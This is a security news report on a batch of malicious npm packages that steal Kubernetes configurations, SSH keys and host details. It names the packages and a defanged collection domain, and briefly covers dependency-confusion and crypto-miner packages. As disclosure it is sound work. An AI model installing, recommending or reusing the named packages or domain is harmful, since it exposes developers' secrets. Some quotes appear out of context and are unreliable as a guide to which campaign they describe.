Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.
Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts.
Along with Kubernetes config and SSH keys, the modules are also capable of harvesting system metadata such as username, IP address, and hostname, all of which are transmitted to a domain named app.threatest[.]com.
The disclosure comes a little over a week after Sonatype detected counterfeit npm packages that exploit a technique known as dependency confusion to impersonate internal packages purportedly used by PayPal Zettle and Airbnb developers as part of an ethical research experiment.
That said, threat actors continue to target open-source registries like npm and PyPI with cryptojackers, infostealers, and other novel malware to compromise developer systems and ultimately poison the software supply chain.
“This targeted approach indicates a sophisticated understanding of cryptocurrency security and suggests that the attacker is aiming to capture and exfiltrate sensitive cryptographic keys for unauthorized access to Ethereum wallets or other secured digital assets,” the company said.
Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM
Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.
Another case of an attempted supply chain attack involved a crafty npm package called gcc-patch that masquerades as a bespoke GCC compiler but actually harbors a cryptocurrency miner that “covertly taps into the computational power of innocent developers, aiming to profit at their expense.”
The campaign specifically targets Apple macOS users, indicating that malware in open-source package repositories is not only becoming increasingly prevalent, but are also singling out other operating systems beyond Windows.
“The author of these packages is staging a broad campaign against software developers,” Phylum noted in an analysis. “The end goal of this campaign remains unclear.”